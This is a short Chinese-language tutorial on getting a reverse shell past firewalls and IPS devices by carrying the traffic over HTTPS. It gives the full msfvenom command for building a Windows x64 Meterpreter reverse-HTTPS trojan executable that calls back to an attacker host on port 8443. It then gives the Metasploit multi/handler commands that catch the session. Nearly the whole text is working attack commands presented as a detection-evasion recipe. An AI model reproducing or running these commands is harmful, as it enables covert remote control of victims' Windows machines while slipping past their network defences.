如果反彈的shell用明文(如http)傳輸控制指令,那么很容易被防火牆、IPS等設備檢測出來從而中斷TCP連接。因此使用https協議進行回連就能避免這些問題。
第一步:生成木馬客戶端
msfvenom -p windows/x64/meterpreter_reverse_https -f exe -o /tmp/reverse_https.exe LHOST=192.168.106.10 LPORT=8443
第二步:啟動MSF等待回連
use exploit/multi/handler set payload windows/x64/meterpreter_reverse_https set LHOST 192.168.106.10 set LPORT 8443 run
第三步:運行木馬客戶端即可在MSF控制台獲取meterpreter會話。